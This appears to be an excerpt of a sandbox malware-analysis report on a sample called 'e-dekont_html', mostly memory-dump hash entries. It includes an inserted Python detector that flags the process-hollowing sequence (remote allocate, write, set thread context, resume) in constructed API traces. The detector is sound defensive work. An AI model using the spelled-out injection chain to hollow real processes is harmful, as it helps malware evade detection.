Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ad4c529060eaa667fee077886a85b2a225a6ecd2d1aaa9c60951f165ca4f1ef4
• Instruction ID: 004b94d22e8c0aaf5d544507de18b6eb6167a35ff123acb58ef77ee1b1e47399
• Opcode Fuzzy Hash: ad4c529060eaa667fee077886a85b2a225a6ecd2d1aaa9c60951f165ca4f1ef4
• Instruction Fuzzy Hash: 4221E4B59002499FDB10CFAAD984ADEFFF8EB48320F14801AE918A7310C378A940CF64
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B10F6
Memory Dump Source
• Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 940a3944e67519116dbb61ceb741ebf9e060bc627fb6f0d2661dc8185fe11617
• Instruction ID: e30db197180697dd1635e70835862f77c46c8e7b6b59e516031c6900e9e8bef9
• Opcode Fuzzy Hash: 940a3944e67519116dbb61ceb741ebf9e060bc627fb6f0d2661dc8185fe11617
• Instruction Fuzzy Hash: 0E1159B59002499FCB20DFAAC845BDEFFF5EF89320F24841AE519A7250C775A540DFA1
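Taken one at a time, the APIs resolved in the 076B0000 region (VirtualAllocEx, WriteProcessMemory, ReadProcessMemory and Wow64SetThreadContext, the variant that rewrites a 32-bit thread's context under WOW64) are routine for debuggers, crash reporters and installers. As an ordered set on one target process they are the RunPE / process-hollowing chain: allocate in the remote process, write into it, redirect a thread by rewriting its context, resume it. The following added example, which is not part of the Joe Sandbox report and not the sample's own code, shows a trace-level detection that only fires when that chain completes in order on the same target, so that isolated reads, writes or handle duplications do not alert. The traces, handle values and any API names beyond those listed above are constructed for illustration.

```python
"""Flag the alloc -> write -> set-context (-> resume) chain in an ordered API-call trace.

Stateful per target process: a single remote read, write or context change is not enough,
the three stages must occur in order on the same handle. Example code, not report output.
"""
from collections import defaultdict
from dataclasses import dataclass

# Native and Win32 spellings of each stage (names beyond those on this page are the usual
# alternatives an injector may call instead; listed here as an assumption, not as observed).
ALLOC = {"VirtualAllocEx", "NtAllocateVirtualMemory"}
WRITE = {"WriteProcessMemory", "NtWriteVirtualMemory"}
SET_CONTEXT = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME = {"ResumeThread", "NtResumeThread"}


@dataclass(frozen=True)
class ApiCall:
    seq: int      # position in the trace
    api: str
    target: str   # process the call acts on (handle value or pid); labels below are made up


def detect_hollowing(calls):
    """Return {target: evidence} for each target that saw alloc -> write(s) -> set-context.

    evidence holds the seq of each stage. A later resume on the same target is recorded
    when present but is not required: the trace may be cut off, or the thread may be
    resumed by a call the trace did not capture.
    """
    stage = defaultdict(lambda: {"alloc": None, "writes": [], "ctx": None, "resume": None})
    hits = {}
    for c in sorted(calls, key=lambda x: x.seq):
        s = stage[c.target]
        if c.api in ALLOC:
            # a fresh remote allocation restarts the chain for this target
            s["alloc"], s["writes"], s["ctx"], s["resume"] = c.seq, [], None, None
        elif c.api in WRITE and s["alloc"] is not None:
            s["writes"].append(c.seq)
        elif c.api in SET_CONTEXT and s["writes"]:
            s["ctx"] = c.seq
            hits[c.target] = dict(s)          # chain complete: alloc -> write+ -> set-context
        elif c.api in RESUME and c.target in hits and hits[c.target]["resume"] is None:
            hits[c.target]["resume"] = c.seq
    return hits


# Constructed trace shaped like the API mix on this page; "0x2a8" is a made-up handle value.
HOLLOWING_TRACE = [
    ApiCall(1, "CreateProcessW", "0x2a8"),         # child created suspended (the target)
    ApiCall(2, "ReadProcessMemory", "0x2a8"),      # typical RunPE step: read the child's image base
    ApiCall(3, "VirtualAllocEx", "0x2a8"),
    ApiCall(4, "WriteProcessMemory", "0x2a8"),     # headers
    ApiCall(5, "WriteProcessMemory", "0x2a8"),     # sections
    ApiCall(6, "Wow64SetThreadContext", "0x2a8"),  # point the suspended thread at the new image
    ApiCall(7, "ResumeThread", "0x2a8"),
]
# Debugger-like activity: handle duplication and reads only, nothing written or redirected.
BENIGN_TRACE = [
    ApiCall(1, "DuplicateHandle", "0x1f4"),
    ApiCall(2, "ReadProcessMemory", "0x1f4"),
    ApiCall(3, "ReadProcessMemory", "0x1f4"),
]
# Breakpoint-style patching: a write and a context change with no remote allocation first.
PATCH_TRACE = [
    ApiCall(1, "WriteProcessMemory", "0x3c0"),
    ApiCall(2, "SetThreadContext", "0x3c0"),
]


if __name__ == "__main__":
    for name, trace in (("hollowing", HOLLOWING_TRACE), ("benign", BENIGN_TRACE), ("patch", PATCH_TRACE)):
        print(name, detect_hollowing(trace))
```

The ordering requirement is the point: the PATCH_TRACE contains two of the three APIs that appear in the dump above and still does not fire, because nothing was allocated in the target first. When feeding real sandbox or EDR telemetry, key the state on the target process rather than on the raw handle value, since injectors commonly call DuplicateHandle (also resolved in the 012B0000 region above) and continue with a second handle to the same process.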
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: dc27dcb5883e26d33f50c15c43aa4886d87aba18775870615b0a5b6f00c78dca
• Instruction ID: b0011724ec713b3d2a65df657cd1ca0740feb2d48abfd2d30619585607f5821a
• Opcode Fuzzy Hash: dc27dcb5883e26d33f50c15c43aa4886d87aba18775870615b0a5b6f00c78dca
• Instruction Fuzzy Hash: F9E18FB8E00219CFDB50CFA8C980A9DBBF2FB49215F2491AAD818E7345D7319D86CF50
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B10F6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: a6abc6369e53328f389ccd7fbe53853c5e5fa60c9b5bb9f4f4e418a269ae9420
                                                                                                                                                          • Instruction ID: e234c020e106ef944c52587847a75be3307bdfb383f6fa98e6bbe9a04572b06d
                                                                                                                                                          • Opcode Fuzzy Hash: a6abc6369e53328f389ccd7fbe53853c5e5fa60c9b5bb9f4f4e418a269ae9420
                                                                                                                                                          • Instruction Fuzzy Hash: 551167B19002499FCB20DFAAC845BDEBFF5EF89320F20841AE529A7250C775A540DFA0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: 6e53673c4e29bbec0f42205b9ef5964929e2daeaf44d017aa0a02851068437d2
                                                                                                                                                          • Instruction ID: 19862926dce1b69a5601f455df0efc6f26003fe325750f7a818f9c65cb85fa43
                                                                                                                                                          • Opcode Fuzzy Hash: 6e53673c4e29bbec0f42205b9ef5964929e2daeaf44d017aa0a02851068437d2
                                                                                                                                                          • Instruction Fuzzy Hash: 691158B1D002498FDB20DFAAD4457EEFFF4EF98324F20841AD419A7340CA79A540CB91
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 076B580D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: 538cf9293a65323e8d1c375eb44d359313855aa145f7bdccda814c751e6072c6
                                                                                                                                                          • Instruction ID: 98df77686a2d17142a2130f274ce63903a49501b7c6ce0cc58808628898e88eb
                                                                                                                                                          • Opcode Fuzzy Hash: 538cf9293a65323e8d1c375eb44d359313855aa145f7bdccda814c751e6072c6
                                                                                                                                                          • Instruction Fuzzy Hash: 391113B58002499FCB20DF99D885BDEFFF8EB48320F10841AE519A7601C375A594CFA1
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: 2160299e8b1e90fee25fd46d41c60579c2e60b8d96087ec07498fb5066ab5848
                                                                                                                                                          • Instruction ID: 293264fd2d3c0361b9f19781fe16f3009f1c67bda45c6d871b0f754e41e7f1da
                                                                                                                                                          • Opcode Fuzzy Hash: 2160299e8b1e90fee25fd46d41c60579c2e60b8d96087ec07498fb5066ab5848
                                                                                                                                                          • Instruction Fuzzy Hash: EC1128B19002498BDB20DFAAC4457DEFFF9AF98324F248419D519A7340C679A540CB91
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 012BAFBE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 84e077fe3cb8d23ae1899ceb41b2f6800d7012c2dfa229048fceaeda95c15fcc
                                                                                                                                                          • Instruction ID: b95712a109122132a2bacf684be2604aa8c54f6f111035a4fa3c824cb817586b
                                                                                                                                                          • Opcode Fuzzy Hash: 84e077fe3cb8d23ae1899ceb41b2f6800d7012c2dfa229048fceaeda95c15fcc
                                                                                                                                                          • Instruction Fuzzy Hash: BC11E0B5C002498FDB24CF9AD484ADEFBF4EF88324F14841AD529A7650D379A545CFA1
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 076B580D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: e4ef5f7356006313ad040a39085b7e5364d84f305731c8d930f611d49a69b339
                                                                                                                                                          • Instruction ID: 2bd9d32427937b471b8a37376caacaf9622f95a0f4e7efc2c9b4db1d599c611b
                                                                                                                                                          • Opcode Fuzzy Hash: e4ef5f7356006313ad040a39085b7e5364d84f305731c8d930f611d49a69b339
                                                                                                                                                          • Instruction Fuzzy Hash: 0F11C2B58002599FDB20DF9AD985BDEFBF8EB48320F24841AD519A7200C375A554CFA1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: d4c75f42e3f6ff6c96142b8360c1fcfe29092a05d65d4056dfc60d986317014f
                                                                                                                                                          • Instruction ID: ac730e33a6362649d229f72ab3745d195acec36220fbe66c59700ad596d8c1e2
                                                                                                                                                          • Opcode Fuzzy Hash: d4c75f42e3f6ff6c96142b8360c1fcfe29092a05d65d4056dfc60d986317014f
                                                                                                                                                          • Instruction Fuzzy Hash: 3C91D5B8E042189FCB14DFB9C8806AEBBF2EB49315F209529D819E7385E7359946DF40
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tefq
                                                                                                                                                          • API String ID: 0-1066582953
                                                                                                                                                          • Opcode ID: 03f013a0ed44654d14837a12bfe9652468d5c4276bd9c60de1231a74dd815f1d
                                                                                                                                                          • Instruction ID: 53cc456548bfd6677ac7225ad9250cbc16ab6cfc1a98c3f305b44be6b1203d5d
                                                                                                                                                          • Opcode Fuzzy Hash: 03f013a0ed44654d14837a12bfe9652468d5c4276bd9c60de1231a74dd815f1d
                                                                                                                                                          • Instruction Fuzzy Hash: F851C074B002199FCB15DF79988847EBBF6EFC82107148969E456DB392DB709C068B50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8jq
                                                                                                                                                          • API String ID: 0-3286795621
                                                                                                                                                          • Opcode ID: 4ea63230f68caa320dba7bb4d58d3476d604c1199d86accf51685397dd66ab02
                                                                                                                                                          • Instruction ID: 2b566fd277de95620829eaf520d3dec9dddf9ec2f731e770e4470ceb843473e9
                                                                                                                                                          • Opcode Fuzzy Hash: 4ea63230f68caa320dba7bb4d58d3476d604c1199d86accf51685397dd66ab02
                                                                                                                                                          • Instruction Fuzzy Hash: 314104B9E011099FCB08DFA8D590AAEBBF2FB88305F109429E915A7380DB319D42DF54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8jq
                                                                                                                                                          • API String ID: 0-3286795621
                                                                                                                                                          • Opcode ID: b750212d8f65e7042ee04de8e7d076b9e2b70a92c2cee959055b2a93f1a2b593
                                                                                                                                                          • Instruction ID: 619a30003541e21172c1451170114aa0972a01dcfd4c5531813f2437a7d13a3e
                                                                                                                                                          • Opcode Fuzzy Hash: b750212d8f65e7042ee04de8e7d076b9e2b70a92c2cee959055b2a93f1a2b593
                                                                                                                                                          • Instruction Fuzzy Hash: 8F415A74E011099FCB08DFA8D5806AEBBF2FB89304F10846AE955E7390DB319D42CF54
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: Tefq
• API String ID: 0-1066582953
• Opcode ID: 6066c487e8bd4260f674b707c66ca79db31ea3f47774bae819c6522ceb21f6b0
• Instruction ID: a018d84e08534d1e13725b769cb18995b6e04e340fb928ba6d5666f786016a06
• Opcode Fuzzy Hash: 6066c487e8bd4260f674b707c66ca79db31ea3f47774bae819c6522ceb21f6b0
• Instruction Fuzzy Hash: FB31E4B5E042188FDB08CFAAC5446EEBBB6FF89301F14D02AD419AB394DB705946CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: Tefq
• API String ID: 0-1066582953
• Opcode ID: dd9133b1a49ed4dddd27ddd77c574c8f911040a3ce3300604ff657ab89dd3b5d
• Instruction ID: 27f53ff227c77aecfaa7c7ce36bf1facb0e61d5670358ab7aaed1f996897f0d6
• Opcode Fuzzy Hash: dd9133b1a49ed4dddd27ddd77c574c8f911040a3ce3300604ff657ab89dd3b5d
• Instruction Fuzzy Hash: EA111F71F0021A8FDB54EBB999105EFB7B6AB89252B10406DC514E7384EF719E02DFA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: Tefq
• API String ID: 0-1066582953
• Opcode ID: cd169a34140b77433a077a6689e8405b09a7eab014fd639105b72f17cc31a6ae
• Instruction ID: bb1f22d55c999fb7c83bbeff77d271cdacbb1fab92b7d65335de9f718b26f4d9
• Opcode Fuzzy Hash: cd169a34140b77433a077a6689e8405b09a7eab014fd639105b72f17cc31a6ae
• Instruction Fuzzy Hash: AD116D75E002199FCB09CFE8D8849EDFBB2FF88314F14816AE918AB265C7316856CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: 7
• API String ID: 0-1790921346
• Opcode ID: acdc8a511917504139dafd16b9122dca7f2f861451ec6e7a64ea181994dee38c
• Instruction ID: 6d4e8afe0131a3ec4192dba498f0460fb0cd9425baed6cc80897b4f96240f758
• Opcode Fuzzy Hash: acdc8a511917504139dafd16b9122dca7f2f861451ec6e7a64ea181994dee38c
• Instruction Fuzzy Hash: 56E0C2B4C0610CEFCB10EFF8E8096AD7BB8A74020AF600198C50663380E7314A85EE45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: 6
• API String ID: 0-498629140
• Opcode ID: 76f466c5c70ab3647c661c5bed9baae07ca6e8d6d60221227168f7090bdc134c
• Instruction ID: 137dd5c7501ef130d248219521c2562509a87dad2df2ed68e0b52b15f8c1fd43
• Opcode Fuzzy Hash: 76f466c5c70ab3647c661c5bed9baae07ca6e8d6d60221227168f7090bdc134c
• Instruction Fuzzy Hash: 57E0C270C04208EFCB24EFB8D5896ADBFF8A709206F10559DD40593380EF329A81EE41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
• Opcode ID: 82341814f31532dc03731cc327f782207f3a9d0788164d9c53fa2db5bcd65c1b
• Instruction ID: c5059131d7e11b44e8dcf1f7d2eefa30eb5b1a69545904af1f22e685ceb5a023
• Opcode Fuzzy Hash: 82341814f31532dc03731cc327f782207f3a9d0788164d9c53fa2db5bcd65c1b
• Instruction Fuzzy Hash: EAE08C78D05208DFCB14FAF8D4086AD7AB89B00202F0001D8C4455B380E6326AA4EEA2
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d59cc8f072456adb07cfe9d227ea79ee45c900e4d0d5118b57bd182836742c3b
• Instruction ID: 55f20c7c95781cae89983c1bbf154d39b66b3f3367ba18b8878cf1272d41fcb4
• Opcode Fuzzy Hash: d59cc8f072456adb07cfe9d227ea79ee45c900e4d0d5118b57bd182836742c3b
• Instruction Fuzzy Hash: D6A10C71E1121ACFCB04DFA8D980AADBBB5FF88311F209615E409AB355DB30AC85DF50
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29fb5d5eeb5d22134538ebcf9efd1ea6fb598b8816dadd4e100565292ffa7ac6
• Instruction ID: b628594fdcce7366f2a18798cc7cd15a035c98d069b977ec867368437b9931e9
• Opcode Fuzzy Hash: 29fb5d5eeb5d22134538ebcf9efd1ea6fb598b8816dadd4e100565292ffa7ac6
• Instruction Fuzzy Hash: B5819179E04219CFDF11CFA8C880AAEBBB2EF59305F109469E819EB341E7359956DF40
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ccc050c73acb0b71079c339a4de81579beb1b628eae624fc9bb7354919dd6ecf
• Instruction ID: 5e85cd4865761ff756e12de2f2dee239ddb68d53bc2ed8b2e8ab886d91eff1d8
• Opcode Fuzzy Hash: ccc050c73acb0b71079c339a4de81579beb1b628eae624fc9bb7354919dd6ecf
• Instruction Fuzzy Hash: 6051E375E083889FCB02DFB8C94499EBFF5AF4A210F1484EAE444EB292D7359805CF61
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f1258d11a390b0beb47f383981b679b7671d029fcfd6ca865f760f26284a6fa0
• Instruction ID: d97f50347b7ebd5bc56d4fd12bcd6b50ff948ed002f665e09e45336dc5ca03f7
• Opcode Fuzzy Hash: f1258d11a390b0beb47f383981b679b7671d029fcfd6ca865f760f26284a6fa0
• Instruction Fuzzy Hash: 674118B5D08209CFCB04CFAAC5446FEBBF6EB8D322F14E1A9D459A6295D7308981DF50
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c52ebe140a99e8f6b43ba5b0c47efb56b8f70aa55762e0efae5a50142a15d2f7
• Instruction ID: 526d06c5478036f6aae14823b2b474a2702f721b115e07abcba700dc3be1841d
• Opcode Fuzzy Hash: c52ebe140a99e8f6b43ba5b0c47efb56b8f70aa55762e0efae5a50142a15d2f7
• Instruction Fuzzy Hash: 7B413B75D05204CFC704CFADC5848ADFBBAFF49312B24A254E419A7292C735E981EF90
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 496eb7f6ca063999f1e9d0a46a85de46f6d3a9e746fc36a5c57692dd92440fbb
• Instruction ID: 86e0440d07ceefdb60212d7caab422e6e320a1e9fdb55b7980676c7d12566953
• Opcode Fuzzy Hash: 496eb7f6ca063999f1e9d0a46a85de46f6d3a9e746fc36a5c57692dd92440fbb
• Instruction Fuzzy Hash: 6941F7B4E10218DFCB04DFA9D880AAEBBF1EB89311F149469D825E7380EB359D42CF51
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f60f8eabf93fa05b2d88d699c3a0f96b9b3e110bd157bfc282ef27ed8cd1854
• Instruction ID: 0736697175a7121e36c6636fba2d869f96db82f6d49c1e8cec10293edac91e9f
• Opcode Fuzzy Hash: 6f60f8eabf93fa05b2d88d699c3a0f96b9b3e110bd157bfc282ef27ed8cd1854
• Instruction Fuzzy Hash: BA4117B4E10208DFCB04DFA8C880AAEBBB2EB89311F159569D815E7390EB359D42CF50
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba739fdf4d4e23d0ce53a819f36d8f632b7ef9e2c0a45fa4215ee9bf378bc0ce
• Instruction ID: a264575515a39217c33659cc5da43f20c40779da836a8272b7a97b78f2250234
• Opcode Fuzzy Hash: ba739fdf4d4e23d0ce53a819f36d8f632b7ef9e2c0a45fa4215ee9bf378bc0ce
• Instruction Fuzzy Hash: D6410475D09218CFCB20CFA8D984BECBBB5FB49312F105295E50AA7291C731AE81DF21
Memory Dump Source
• Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3fdcd61d4111724488713e372690f562cbfcdc882824c4a1634b412ffc970c4d
                                                                                                                                                          • Instruction ID: 89e87c60e622f31f6e389b879426492801d3536d61585bcf575f85629f478302
                                                                                                                                                          • Opcode Fuzzy Hash: 3fdcd61d4111724488713e372690f562cbfcdc882824c4a1634b412ffc970c4d
                                                                                                                                                          • Instruction Fuzzy Hash: C241FA74E1120A8FDB44DFBAD8596AEBBF1BF49206F109429E846E3350EB31D951CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 607ede2496a39fcf7b2f36ee3469f9b5e05ff774408a45f72bbffa5fe20e7db9
                                                                                                                                                          • Instruction ID: 4d6d476d18e1d7d22dc209e1c9e78e9028b38bc1b312088c6debd992573e4e2c
                                                                                                                                                          • Opcode Fuzzy Hash: 607ede2496a39fcf7b2f36ee3469f9b5e05ff774408a45f72bbffa5fe20e7db9
                                                                                                                                                          • Instruction Fuzzy Hash: 3F31E774E1120A8FCB54DFBAD8596AEBBF1BF49206F109429E806E3390EB31D951CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4aee82f873128d1a64080b2ccb2f8ccaa221a5b0e1b84559222dee1205ae65c7
                                                                                                                                                          • Instruction ID: 0e856e6152faf035da0dec67ff18e4031f298419daa5557913724078079c039d
                                                                                                                                                          • Opcode Fuzzy Hash: 4aee82f873128d1a64080b2ccb2f8ccaa221a5b0e1b84559222dee1205ae65c7
